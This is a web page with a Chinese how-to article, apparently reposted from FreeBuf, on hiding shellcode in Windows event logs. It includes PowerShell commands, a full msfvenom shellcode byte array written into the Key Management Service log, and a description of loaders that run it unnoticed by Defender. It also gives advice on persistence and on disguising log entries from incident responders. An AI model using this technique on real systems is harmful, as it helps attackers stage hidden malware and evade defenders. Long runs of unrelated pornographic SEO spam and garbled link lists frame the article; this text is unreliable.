精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

巧用Windows事件日志“隱藏”載荷

系統 Windows
Windows默認事件日志查看器為eventvwr.msc,能實現簡單的使用,Win+R鍵后輸入eventvwr回車即能打開。Windows主要的日志在“Windows 日志”中,該文件夾中包含所有Windows系統上的五個標準類別。比較常用的Windows日志有系統日志、安全日志、應用程序日志這三個日志內容。

背景

根據卡巴斯基發布的研究報告發現一項惡意活動,其中的技術涉及將shellcode直接放入Windows事件日志,Windows事件日志可以被攻擊者用來掩蓋特洛伊木馬病毒的惡意使用。實現了”無文件”攻擊技術,下面就利用該涉及的技術,簡單嘗試一下。

前置知識

Windows事件日志

Windows默認事件日志查看器為eventvwr.msc,能實現簡單的使用,Win+R鍵后輸入eventvwr回車即能打開。Windows主要的日志在“Windows 日志”中,該文件夾中包含所有Windows系統上的五個標準類別。比較常用的Windows日志有系統日志、安全日志、應用程序日志這三個日志內容。

  • 應用程序
  • 安全
  • Setup
  • 系統
  • Forwarded Events

1.jpg

事件查看器的另一個“應用程序和服務日志”文件夾里,包含Windows系統中其它各類重要服務組件的事件日志。Windows PowerShell日志在該集合中。

Windows事件日志文件實際上是以特定的數據結構的方式存儲內容,每條記錄事件的數據結構由9個字段組成,包括日志名稱、來源、記錄時間、事件ID、任務類別、級別、計算機、事件數據(EventData)等信息。其中事件數據僅支持消息和二進制數據

寫入事件日志

我們可以使用PowerShell操作Windows事件日志,其中Write-EventLog命令可以將事件寫入事件日志,參考微軟官方文檔,其中參數對應上面介紹的字段:

2.png

執行命令

Write-EventLog -LogName Application -Source edge -EventID 65535 -EntryType Information -Category 0 -Message "Hello World!"

3.png

在事件查看器中,可以看到事件ID為65535的日志成功創建在應用程序日志中,消息為Hello World!

4.png

簡單復現

寫入載荷

只需在Write-EventLog中使用-RawData參數,就可以在事件日志字段中包含二進制數據,而且必須將二進制數據作為字節數組傳到-RawData參數中。我們可以將其包含數據的十六進制字符串轉換為字節數組,然后再傳遞。

首先,使用msfvenom生成彈計算器 payload。輸出格式為十六進制字符串

5.png

利用工具網站轉為字節數組

6.png

$data = [Byte[]](0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00)

使用密鑰管理服務日志和KmsRequests作為源進行事件日志寫入。

Write-EventLog -LogName 'Key Management Service' -Source KmsRequests -EventID 9999 -EntryType Information -Category 0 -Message "Hello World!" -RawData $data

執行后,Payload已成功存儲到事件日志當中。于事件日志的詳細信息就能查看到。

7.png

8.png

執行載荷

為了提取并執行寫入的載荷,這邊用非常簡單的C++程序和Python腳本進行證明,代碼放在??這里??。

用Visual Studio編譯PoC代碼后放在環境中執行,從”隱藏”在事件日志Key Management Services的第一條日志中提取二進制載荷數據并且成功執行。過程中defender并未對其進行告警。

9.png

10.png

另外使用Python的win32evtlog實現讀取事件日志內容,然后也用非常常見的shellcode注入技術執行該載荷。

11.png

同樣成功執行隱藏在事件日志中的載荷:

12.png

可以看到,對Windows事件日志寫入和讀取Shellcode,都是使用合法的API調用,所以能借此很好的對載荷進行隱藏。作為一種持久化方法,還是能有更好的玩法。例如配合DLL搜索順序劫持加載惡意代碼等。

注意事項

用戶限制

事件日志的寫入權限問題。為了能在事件日志條目中存儲有效負載,我們拿到的權限必須要能寫入日志。

大小限制

需要注意的另一個限制是,事件日志中可以存儲的數據量有大小限制。基于事件消息字符串的最大字符限制為31,839個字符。

更持久

在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\對應的日志名稱下的條目中,存在一個EventMessageFile屬性。如果在注入載荷的時候,事件ID不存在于該屬性指定的源關聯的事件消息文件中,則會出現下圖這個日志消息:

13.png

為了能夠更加的持久化不被發現,事件ID和級別等字段都應該偽裝成日常日志的樣子,以免被應急人員察覺到異常。

參考:

??https://threatpost.com/attackers-use-event-logs-to-hide-fileless-malware/179484??

??https://securelist.com/a-new-secret-stash-for-fileless-malware/106393??

??https://learn.microsoft.com/zh-cn/windows/win32/api/winbase/nf-winbase-readeventloga???

本文作者:supersaiyan, 轉載請注明來自??FreeBuf.COM??

責任編輯:武曉燕 來源: FreeBuf.COM
相關推薦

2022-05-10 14:21:12

惡意軟件黑客網路攻擊

2011-11-21 16:49:58

日志常用事件

2010-01-25 13:31:27

C++程序

2019-12-04 14:30:43

事件日志Windows 10Windows

2024-10-22 08:47:03

2021-02-01 00:04:13

Dictionary數據批量

2021-02-14 20:41:56

API日志web

2009-01-05 16:56:59

2022-07-09 16:34:42

網絡攻擊惡意軟件

2009-10-10 09:43:10

2024-08-26 08:27:18

2011-07-26 10:32:44

windows7組策略

2010-01-25 12:58:26

2011-08-31 14:12:17

2011-07-26 15:11:51

安全模式

2017-03-08 17:00:20

Windows 7Windows系統故障

2010-04-13 14:57:49

2011-11-21 15:44:46

管理服務器日志

2011-08-01 09:02:16

2009-03-24 09:15:42

Windows 7使用技巧微軟
點贊
收藏

51CTO技術棧公眾號

亚洲精品自拍动漫在线| 国产最新精品精品你懂的| 国产视频在线一区二区| 欧美两根一起进3p做受视频| 日本在线免费网| 国产成人在线色| 欧洲中文字幕国产精品| 精品亚洲乱码一区二区| 国产丝袜一区| 欧美日韩亚洲另类| 国内精品视频一区二区三区| 国产一级网站视频在线| 国产精品中文字幕一区二区三区| 91精品国产沙发| 国产精品久久国产精麻豆96堂| 精品嫩草影院| 欧美日韩国产精选| 拔插拔插海外华人免费| 日本在线免费播放| 2021中文字幕一区亚洲| 91精品啪aⅴ在线观看国产| 日韩精品在线免费看| 国产精品99一区二区三区| 日韩国产精品亚洲а∨天堂免| 亚洲欧美在线精品| 成人观看网址| 一区二区三区在线观看欧美| 日韩成人av电影在线| 成人精品在线播放| 老司机免费视频一区二区| 7777精品视频| 久久激情免费视频| 天天做综合网| 尤物yw午夜国产精品视频| 中文字幕一区二区三区人妻在线视频| 97人人做人人爽香蕉精品| 香蕉成人伊视频在线观看| 咪咪色在线视频| 国产精品一级伦理| 久久综合视频网| 成人在线视频网址| 国产人妻精品一区二区三区| 日产欧产美韩系列久久99| 91高潮精品免费porn| 国产在线视频在线观看| 欧美理论在线| 欧美精品免费播放| 91久久久久久久久久久久久久| 俺要去色综合狠狠| 亚洲免费一在线| 亚洲国产无码精品| 中日韩免视频上线全都免费| 日韩电影中文字幕| 韩国三级hd中文字幕有哪些| 国产精品一区二区三区www| 欧美亚洲日本一区| 高清一区二区视频| 91在线成人| 欧美美女一区二区| 最新免费av网址| av日韩一区| 日韩一级完整毛片| 中文字幕乱码在线人视频| 秋霞影院一区| 亚洲成人激情视频| 黄色性生活一级片| 视频一区欧美| 亚洲欧美激情在线视频| 国产美女精品久久| 成人黄色av| 精品国偷自产在线视频99| 免费在线观看a级片| 欧美成人一品| 久久久久久久999精品视频| 日韩三级视频在线| 亚洲资源av| 国产极品jizzhd欧美| 夜夜爽8888| 国产91精品久久久久久久网曝门| 国产精品乱子乱xxxx| 亚洲人午夜射精精品日韩| 久久午夜电影网| 亚洲一区在线直播| 中文字幕免费高清电视剧网站在线观看| 亚洲色大成网站www久久九九| 无码人妻精品一区二区蜜桃网站| 色老头在线一区二区三区| 色天使色偷偷av一区二区| 99视频在线视频| 久久久精品区| 日韩不卡在线观看| www亚洲色图| 欧美喷水视频| 日本成人在线视频网址| 一本一道人人妻人人妻αv| 精品一区二区三区的国产在线播放| 91手机在线观看| 暖暖视频在线免费观看| 国产精品久久久久久妇女6080| 国产资源第一页| 中国色在线日|韩| 91精品国模一区二区三区| 亚洲天堂av网站| 日韩在线综合| 97国产精品久久| 91成人在线免费| 2021中文字幕一区亚洲| 久久天天东北熟女毛茸茸| 亚洲永久av| 欧美一二三区在线| 亚洲午夜久久久久久久国产| 亚洲视频精品| 国产精品一区二区3区| 日韩一区二区三区不卡| 日韩一区在线免费观看| 欧美激情国产精品日韩| 综合伊人久久| 久久影院模特热| 免费精品一区二区| www.视频一区| 国产精品videossex国产高清| 91综合国产| 国产一区二区三区在线播放免费观看| 欧美日韩偷拍视频| 久久精品99久久久| 日韩欧美精品在线不卡 | 国产91精品一区二区麻豆网站| 欧美日韩一区二| 国产欧洲在线| 精品国产凹凸成av人网站| 亚洲欧洲综合网| 日韩电影免费在线| 久久精品国产综合精品| 91丝袜在线| 日韩一级黄色大片| 国产3级在线观看| 日本亚洲一区二区| 欧美久久久久久| 交100部在线观看| 亚洲精品在线观| 日本a级片视频| 国产一区中文字幕| 欧美日韩视频免费在线观看| 色8久久久久| 中文国产成人精品| 亚洲精品欧美日韩| 精品女同一区二区三区| 成人免费在线播放视频| wwwwwxxxx日本| 国产大片一区| 亚洲一区中文字幕| 性欧美猛交videos| 日韩精品一区二区三区四区视频 | 亚洲成av人片在www色猫咪| 亚洲精品一区二区18漫画| 欧美激情日韩| 国产精品一区在线观看| av手机在线观看| 日韩成人av网| 国产免费a视频| 欧美激情一区在线观看| 99re精彩视频| 亚洲激情中文| 国产精品精品软件视频| 黄色软件视频在线观看| 亚洲精品永久免费精品| 成人一级免费视频| 最新国产精品久久精品| 性一交一黄一片| 午夜一区不卡| 日本a级片久久久| 农村妇女一区二区| 久久国产精品久久国产精品| 成人久久久精品国产乱码一区二区| 亚洲国产日韩在线一区模特| 欧美性xxxx图片| 麻豆精品久久久| 欧美一级欧美一级| 你懂的视频欧美| 国产啪精品视频网站| 污污的网站在线免费观看| 亚洲精品电影网站| 在线观看免费中文字幕| 亚洲一线二线三线视频| 四虎影成人精品a片| 久久99国产精品久久99果冻传媒| 奇米777四色影视在线看| 日韩av资源网| 91精品国产综合久久香蕉最新版| a级大胆欧美人体大胆666| 亚洲日本欧美中文幕| 99精品国产99久久久久久97| 欧美日韩中文字幕在线| 国产真实乱在线更新| 91在线视频免费91| 在线免费黄色网| 国产精品久久777777毛茸茸| 在线码字幕一区| 欧美三级午夜理伦三级在线观看| 国产专区欧美专区| 欧美gv在线| 久久av中文字幕| 韩日视频在线| 亚洲国产精品va| 99国产揄拍国产精品| 色狠狠桃花综合| 国产一级中文字幕| 国产精品久久久久久久久图文区| 一级欧美一级日韩片| 国产原创一区二区三区| 熟女少妇精品一区二区| 亚洲国产精品一区| 国产高潮呻吟久久久| 中文字幕精品影院| 国产日产精品一区二区三区四区 | 91.成人天堂一区| 日本一本在线观看| 精品久久久国产| 久久久久99精品成人片试看| 国产精品免费人成网站| 爱爱免费小视频| 不卡电影一区二区三区| 国产男女无遮挡猛进猛出| 日韩av电影天堂| 日韩免费毛片视频| 国产日韩精品视频一区二区三区 | 激情欧美一区二区三区在线观看| 国产精品自拍片| 欧美日韩天堂| 亚洲色图都市激情| 国产精品久久久久久久| 亚洲国产精品一区在线观看不卡 | 国产日产欧美一区二区| 日韩国产欧美| 先锋影音网一区| 国产91精品对白在线播放| 久久精品一区二区三区不卡免费视频| 中文在线综合| 成人激情直播| 欧美日韩黄色| 99re视频在线| 成人av激情人伦小说| 99re国产视频| 大奶在线精品| 国产亚洲精品久久飘花| 国产毛片精品| 精品久久久久亚洲| 国产精品x8x8一区二区| 国内一区二区三区在线视频| 国产精品白丝av嫩草影院| 粉嫩高清一区二区三区精品视频 | 美女18一级毛片一品久道久久综合| 国模精品视频一区二区| www.超碰在线| 欧美孕妇与黑人孕交| 美女100%一区| 国产精品丝袜高跟| 四虎视频在线精品免费网址| 91免费看片网站| 日韩亚洲精品在线观看| 国产成人精品福利一区二区三区 | 91亚洲男人天堂| 免费毛片视频网站| 国产欧美综合在线| 国产精品成人在线视频| 中文字幕综合网| 久久视频免费在线观看| 色网综合在线观看| 一级黄色大片网站| 欧美一区欧美二区| 人妻中文字幕一区| 一本色道久久综合狠狠躁篇的优点| 番号集在线观看| 久久福利网址导航| av资源一区| 国产精品青草久久久久福利99| 国产成人免费视频网站视频社区| wwwxx欧美| 亚洲人成精品久久久| 一区二区三区av在线| 欧美女人交a| 国产福利影院在线观看| 国产麻豆成人传媒免费观看| 第四色在线视频| 亚洲国产精品精华液ab| 国产这里有精品| 岛国精品视频在线播放| 亚洲天堂自拍偷拍| 精品国产一区二区三区四区四| 欧美巨乳在线| 久久国产精品亚洲| 欧洲亚洲两性| 999视频在线观看| 欧洲专线二区三区| 黄色片免费在线观看视频| 日韩精品乱码免费| 在线精品视频播放| 国产精品你懂的在线欣赏| 久久久久成人网站| 欧美综合在线视频| 亚洲精品视频专区| 国产一区二区久久精品| 激情网站在线| 国产精品一二三视频| 老司机在线精品视频| 爱爱爱视频网站| 久久久久在线| 亚洲精品国产成人av在线| 中文字幕在线观看一区二区| 国产精品成人aaaa在线| 欧美日韩免费一区二区三区| 天堂av网在线| 色综合久久中文字幕综合网小说| 在线国产成人影院| 蜜桃导航-精品导航| 黄色av一区| 在线a免费观看| 中文字幕av不卡| 国产又大又黄又粗| 亚洲风情亚aⅴ在线发布| v天堂福利视频在线观看| 国产精品亚洲欧美导航| 国产成人高清| 日韩少妇内射免费播放18禁裸乳| 国产a区久久久| tube国产麻豆| 欧美精品久久99久久在免费线| 国产黄在线播放| 日本一区二区在线免费播放| 欧美日韩麻豆| 国产97在线 | 亚洲| 丰满放荡岳乱妇91ww| 加勒比av在线播放| 日韩一级片在线观看| 日本网站在线免费观看视频| 国产精品午夜一区二区欲梦| 蜜桃一区二区三区| 人妻内射一区二区在线视频| 91视频免费看| 欧美 日韩 精品| 精品视频偷偷看在线观看| 亚洲欧美se| 热舞福利精品大尺度视频| 老牛国产精品一区的观看方式| 亚欧洲乱码视频| 91精品福利在线| 77导航福利在线| 国产精品尤物福利片在线观看| 成人黄色av| 九九热精品国产| 亚洲免费三区一区二区| 99视频国产精品免费观看a| 欧美多人乱p欧美4p久久| 91精品导航| 欧美深夜福利视频| 2024国产精品| 亚洲天堂网视频| 久热99视频在线观看| 日韩三级网址| 97av视频在线观看| 亚洲国产激情av| 国产黄色小视频在线观看| 欧美第一页在线| 日韩aaa久久蜜桃av| 亚洲最大综合网| 最新欧美精品一区二区三区| 亚洲精品一区二区三区新线路| 91精品国产91久久久| 欧美热在线视频精品999| 亚洲涩涩在线观看| 夜夜爽夜夜爽精品视频| 日本一级在线观看| 国产精品流白浆视频| 亚洲精品电影| 添女人荫蒂视频| 欧美亚洲日本一区| 三级网站视频在在线播放| 玛丽玛丽电影原版免费观看1977 | 古装做爰无遮挡三级聊斋艳谭| 亚洲第一搞黄网站| 国产在线观看免费| 亚洲精品日产aⅴ| 国产精品久久国产愉拍| 呻吟揉丰满对白91乃国产区| 日韩美女主播在线视频一区二区三区| cao在线视频| 一区二区精品国产| 99久久久久久99| 亚洲一级视频在线观看| 久久久亚洲国产| 色乱码一区二区三区网站| 美女扒开腿免费视频| 欧美最猛性xxxxx直播| 波多野结衣乳巨码无在线观看| 天天综合色天天综合色hd| 成人一道本在线| 中文在线a天堂| 7777精品久久久久久| 亚洲乱码免费伦视频| www.色天使|